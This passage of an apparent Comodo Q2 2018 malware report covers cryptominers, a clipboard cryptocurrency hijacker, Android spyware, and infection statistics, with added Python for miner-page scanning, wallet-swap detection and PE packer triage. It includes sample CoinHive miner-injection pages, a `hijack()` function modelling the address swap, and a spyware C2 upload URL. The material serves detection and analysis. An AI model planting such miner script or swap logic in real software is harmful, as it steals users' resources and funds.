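        host = _host(attrs.get("src", ""))
        if host in MINER_HOSTS:
            findings.append({"kind": "iframe", "host": host, "hidden": is_hidden(attrs), "encoded": depth > 0})
    if INLINE_API.search(text):
        findings.append({"kind": "inline-js", "host": "", "hidden": False, "encoded": depth > 0})
    if depth < 3:
        for decoded in _decoded_literals(text):
            findings.extend(scan_html(decoded, depth + 1))
    return findings


# Constructed sample pages; cnhv.co/EXAMPLE is a placeholder, not a real shortlink.
PLAIN_PAGE = ('<html><body><script src="https://coinhive.com/lib/coinhive.min.js"></script>'
              '<script>var miner = new CoinHive.Anonymous("SITE-KEY"); miner.start();</script></body></html>')
_HIDDEN_IFRAME = '<iframe src="https://cnhv.co/EXAMPLE" width="1" height="1" frameborder="0"></iframe>'
ENCODED_PAGE = ('<html><body><h1>Daily news</h1><script>document.write(atob("%s"));</script></body></html>'
                % base64.b64encode(_HIDDEN_IFRAME.encode()).decode())
CLEAN_PAGE = '<html><body><iframe src="https://www.example.org/embed" width="640" height="360"></iframe></body></html>'

if __name__ == "__main__":
    for label, page in (("plain", PLAIN_PAGE), ("encoded", ENCODED_PAGE), ("clean", CLEAN_PAGE)):
        print(label, scan_html(page) or "no miner found")
```

Scheme-relative sources (`//cnhv.co/...`) still yield a hostname from urlparse, and the recursion depth limit keeps a nested atob(atob(...)) loader from running away. Dynamic loaders that assemble the string at run time (string concatenation, eval of fetched code) need the rendered DOM rather than the static source, so this is a first-pass static check.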

The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief than a cryptominer, because it does not devour an infected machine's resources but instead steals cryptocurrency outright, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in by hand. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can exploit.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control, so the unsuspecting owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.

A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The trojanized version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
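The substitution above works because a wallet address is a recognisable token. The following is an added example for this edit (not the report's or the sample's code) built around that fact: `b58check_decode()` is the proper validity check for legacy Bitcoin addresses (Base58Check: version byte, 20-byte hash, double-SHA-256 checksum), `hijack()` models the malware's regex-and-replace step using the two addresses quoted above, and `classify_paste()` is the check a wallet front end or a paste hook can run right before a transaction is sent. Only legacy '1...'/'3...' Bitcoin addresses are handled; bech32 and other coins would need their own matchers.

```python
"""Wallet-address handling for the clipboard-swap case above. Added example, not the report's
or the malware's code; the addresses in the demo are the two quoted on the page."""
import hashlib
import re

_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_B58_INDEX = {c: i for i, c in enumerate(_B58)}
# Legacy Bitcoin P2PKH ('1...') and P2SH ('3...') addresses, matched loosely, the way a hijacker does.
BTC_ADDRESS = re.compile(r"\b[13][1-9A-HJ-NP-Za-km-z]{25,34}\b")


def b58check_decode(addr):
    """Return the 21-byte payload (version byte + hash160) if the Base58Check checksum verifies, else None."""
    n = 0
    for ch in addr:
        if ch not in _B58_INDEX:
            return None
        n = n * 58 + _B58_INDEX[ch]
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading = len(addr) - len(addr.lstrip("1"))   # each leading '1' stands for a 0x00 byte
    raw = b"\x00" * leading + body
    if len(raw) != 25:
        return None
    payload, checksum = raw[:21], raw[21:]
    if hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] != checksum:
        return None
    return payload


def is_valid_btc_address(addr):
    return b58check_decode(addr) is not None


def find_addresses(text):
    """Address-looking tokens in free text (syntax only; validate with is_valid_btc_address)."""
    return BTC_ADDRESS.findall(text)


def hijack(clipboard_text, attacker_address):
    """Model of the malware's substitution step: any address-looking token becomes the attacker's."""
    return BTC_ADDRESS.sub(attacker_address, clipboard_text)


def classify_paste(intended, clipboard_now):
    """Compare the address the user copied with what is in the clipboard right before sending.
    'swapped' (a different but well-formed address) is the clipboard-hijacker signature."""
    if clipboard_now == intended:
        return "unchanged"
    if find_addresses(intended) and find_addresses(clipboard_now):
        return "swapped"
    return "corrupted"


# The two addresses from the report's example: the one the user copied and the one that got pasted.
USER_ADDRESS = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
ATTACKER_ADDRESS = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    copied = "send to " + USER_ADDRESS
    pasted = hijack(copied, ATTACKER_ADDRESS)        # what the infected clipboard hands back
    print(pasted)
    print(classify_paste(USER_ADDRESS, find_addresses(pasted)[0]))
    for a in (USER_ADDRESS, ATTACKER_ADDRESS):
        print(a, "checksum ok" if is_valid_btc_address(a) else "checksum FAILED")
```

The report does not say whether the two quoted addresses carry valid checksums; running the block answers that. The defensive point is the comparison in `classify_paste()`: a hijacker produces a different but well-formed address, which is exactly the case a plain "does this look like an address" check lets through.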

Although cryptominers decreased in number, they keep coming back in updated disguises and promise to remain a serious challenge for cybersecurity departments and vendors.


4 Android devices under siege

4.1 Spying, stealing, mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: every smartphone now holds a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners, and parents wanting to control their children, and it is easy to see why Android-oriented malware is a growing business.

Today spying is the number-one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks in the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multiple spying capabilities. It steals account details (contact ID, name, phone numbers and email address of the owner). It grabs SMS messages and their associated metadata. It attempts to read call logs (number, name, type, duration), emails (email type) and contact photos. After extracting the data, the malware encrypts it with AES and sends it to the attackers' server, http://cgalim.com/admin/hr/pu/pu.php?do=upload.

KevDroid records the victim's every phone call, then encrypts and uploads the recording to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera, covertly records the victim's activity and sends the video to the attackers' server.

Version 3 of KevDroid takes photos, records calls and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This mistaken assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh, delivered as an Instant App. But when a user downloaded and ran it, the app covertly connected to


the cybercriminals' command-and-control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Another means of dissemination was social networks.

Version 1: Dardesh (Google Play Services, Instant Apps)
Version 2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone, a feature set otherwise seen in commercial spyware such as FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts their metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has four different versions:

Version 1: Telegram Groups, انتخاب دھم
Version 2: Postrall, Yes For Referendum, انتخاب دھم
Version 3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机
Version 4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: it extracts SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call-log details and external-storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS service
Record audio and send it to the command-and-control server
Upload image files
Collect information about installed applications
Collect browser data
Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications such as VPN Easy and DroFirewall.


In addition to the abilities of the previous versions, it includes some extra tricks:

Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a "Virtual Girlfriend" application. But instead of a girlfriend it delivers a bundle of malicious abilities:

Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message database and the related key files
Uploads the collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Versions 1 to 3: Facebook, Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contact details
Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls

4.1.5 Stalker Spy

The next malware in the list is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution
FlexiSpy, MBackup
HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service


Mobile Spy
随意代挂, Subway Surfers, 라이브성인방송 (live adult broadcasting), Мобильный антивирус (Mobile Antivirus), droidgetlogevent, SmartcardService, Cheats Z
CloudAgent, New Insta Follow, Android CJ 대한통운 택배 (CJ Logistics parcel delivery), 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент (mobile client), Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware feature set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of LokiBot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 licence".

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on a device:


Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: collect browser history
Start_AllApp: gather information about installed applications
Send_call: set the Intent action to place a call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: invoke the injector class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot:

佐川急便 (Sagawa Express), 현대캐피탈 (Hyundai Capital)

Disguises of FakeSpy

It collects the available information from the infected device and sends it to its C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its command-and-control server:

contacts: get contact details and email ID
Mute: set the action to mute
Mms: get MMS content
info: get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent
pl.mbank
aib.ibank.android

The second version can block access to some applications, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1:
CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره (all-purpose Telegram)
Proxy, دوست یاب (Friend Finder), Telegram Ton


شارژ رایگان بگیر (Get Free Credit), App Master, Anti Rat, PlatformA, فالورگیر نامحدود (Unlimited Follower Getter), اینترنت رایگان (Free Internet)

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run". But it keeps running in the background and starts its spying activity: it steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1:
Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot
Reccoder-Call, QRCodeBar Scanner APK
Let me love you ringtone, Iphone Ringtone, Night light
Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes the infected device to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option. If the user taps this button, the malware begins working in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

The last entry in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which increases its mining capacity. It is disseminated via the counterfeit apps listed below, but one of the vectors is especially interesting.

Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is that possible? Imagine a cybercriminal who wants to infect victims with a cryptominer in order to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it on the victims' machines. What she does not know is that another cybercriminal has already infected that CoinMiner build with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure, and even a predator can turn into prey in seconds.


4.2 Android malware catalogued by month

Below are detailed monthly statistics on Android-targeted malware.

4.2.1 April 2018

Android-targeted malware in April 2018

4.2.2 May 2018

Android-targeted malware in May 2018

4.2.3 June 2018

Android-targeted malware in June 2018


5 Malware in Q2 2018: the big picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic threat: computer worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network services as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, drain network or local system resources and cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing the planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email worms

Email worms spread by mailing copies of themselves to addresses harvested from the victim, typically as attachments that rely on the recipient opening them, although older families also used mail-client exploits and autorun functionality to execute without user interaction.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 P2P worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and attackers take advantage of this to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant-messaging worm, sends malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of the well-known Yahos IM Worm, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with Yahos.

This timeline shows that, while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High-threat malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal authentication, often used to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was DarkComet, a remote access trojan (RAT) that is fully 10 years old. It allows an attacker to control a compromised system through a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber-espionage.

The United Kingdom ("gb", for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other programs and devices by modifying them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, because their malicious functionality is hidden within seemingly useful or benign programs. Typically Trojans grant remote attackers the same rights and privileges as the local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on the victim system and adds it to the administrators group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the number-one country for Trojans according to Comodo's detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer exploits are pieces of software, chunks of data or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage the target computer's software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

Exploit detections are comparatively rare, since the vulnerabilities they target are typically patched soon after they are discovered.

In Q2 2018 the majority of exploits detected by Comodo targeted a favorite attacker target, Adobe Portable Document Format (PDF) files, a format created in the 1990s to present documents independently of application software, hardware and operating system.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium-threat malware

In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to create malware files automatically.

For Q2 Alamar was the number-one constructor that Comodo detected; Microsoft rates this program a "severe" threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely to be a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
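Because MUPX is a modified UPX, matching on the stock UPX0/UPX1 section names is not enough on its own; a renamed build keeps the same shape, an empty high-VirtualSize unpack section beside a compressed, near-random section. The Python below is an added example (not the report's code) that parses the PE section table and applies both checks; the three PE images are constructed just far enough for the section table to parse and are not loadable executables.

```python
"""Packer triage for PE files: stock-UPX section names vs. entropy heuristics.

Added example, not code from the Comodo report. A modified UPX ('MUPX')
build can rename its sections, so matching on 'UPX0'/'UPX1' alone misses
it; the shape of the sections (an empty high-VirtualSize unpack area next to
a near-random compressed blob) still gives it away. The PE images below are
constructed just far enough for the section table to parse; they are not
loadable executables.
"""
import math
import struct

UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}
HIGH_ENTROPY = 7.0  # bits per byte; compressed/encrypted data sits near 8.0


def shannon_entropy(blob: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty or constant data, 8.0 for uniform)."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Yield (name, virtual_size, raw_bytes) for each IMAGE_SECTION_HEADER."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    (num_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_hdr_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    off = e_lfanew + 24 + opt_hdr_size  # section table follows the optional header
    for _ in range(num_sections):
        name, vsize, _va, raw_size, raw_ptr, *_rest = struct.unpack_from("<8sIIIIIIHHI", pe, off)
        yield name.rstrip(b"\0"), vsize, pe[raw_ptr:raw_ptr + raw_size]
        off += 40


def assess_packing(pe: bytes) -> dict:
    """Return which packer indicators fire for this image."""
    sections = list(parse_sections(pe))
    names = {name for name, _, _ in sections}
    # UPX0-style unpack area: nothing on disk, a lot of memory reserved.
    unpack_area = any(vsize > 0 and len(raw) == 0 for _, vsize, raw in sections)
    high_entropy = any(shannon_entropy(raw) >= HIGH_ENTROPY for _, _, raw in sections)
    upx_names = bool(names & UPX_SECTION_NAMES)
    return {
        "upx_names": upx_names,
        "empty_unpack_area": unpack_area,
        "high_entropy": high_entropy,
        "likely_packed": high_entropy and (unpack_area or upx_names),
    }


def build_pe(sections):
    """Construct a minimal PE image (DOS stub, COFF header, section table, raw data).
    SizeOfOptionalHeader is 0, so the image is parseable but not loadable."""
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    headers_len = 64 + 4 + len(coff) + 40 * len(sections)
    table, body, ptr = b"", b"", headers_len
    for name, vsize, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    return dos + b"PE\0\0" + coff + table + body


# Constructed samples. Uniform bytes stand in for compressed code (entropy 8.0).
RANDOM_LOOKING = bytes(range(256)) * 16
STOCK_UPX = build_pe([(b"UPX0", 0x20000, b""), (b"UPX1", 0x3000, RANDOM_LOOKING),
                      (b".rsrc", 0x200, b"\0" * 512)])
MODIFIED_UPX = build_pe([(b".text", 0x20000, b""), (b".data", 0x3000, RANDOM_LOOKING)])
PLAIN_BINARY = build_pe([(b".text", 0x1000, b"\x90" * 4096),
                         (b".data", 0x200, b"hello world\0" * 40)])

if __name__ == "__main__":
    for label, image in (("stock UPX", STOCK_UPX), ("renamed sections", MODIFIED_UPX),
                         ("plain", PLAIN_BINARY)):
        print(label, assess_packing(image))
```

The renamed build trips the entropy and empty-unpack-area checks even though the name check stays silent, which is the point: a name list catches the stock tool, the structural heuristics catch its modified descendants.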

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. Such software includes free toolbars, adware, and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in one but in multiple verticals, clearly making them a current strategic threat across the world.

